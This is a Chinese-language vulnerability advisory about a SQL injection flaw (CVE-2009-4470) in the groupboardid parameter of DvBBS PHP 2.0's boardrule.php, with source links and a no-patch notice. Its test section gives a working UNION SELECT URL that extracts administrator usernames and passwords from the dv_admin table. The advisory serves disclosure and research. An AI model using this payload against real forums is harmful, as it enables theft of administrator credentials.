首页 -> 安全研究

安全研究

安全漏洞
动网论坛DvBBS boardrule.php模块SQL注入漏洞

发布日期:2009-09-04
更新日期:2009-09-07

受影响系统:
动网论坛 Dvbbs php 2.0
描述:
BUGTRAQ  ID: 36282
CVE(CAN) ID: CVE-2009-4470

DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。

DvBBS没有正确地过滤用户提交给boardrule.php模块的groupboardid参数,远程攻击者可以通过向论坛提交恶意参数请求执行SQL注入攻击。

<*来源:Securitylab.ir
  
  链接:http://marc.info/?l=bugtraq&m=125207676114405&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/

建议:
厂商补丁:

动网论坛
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dvbbs.net/

浏览次数:3594
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障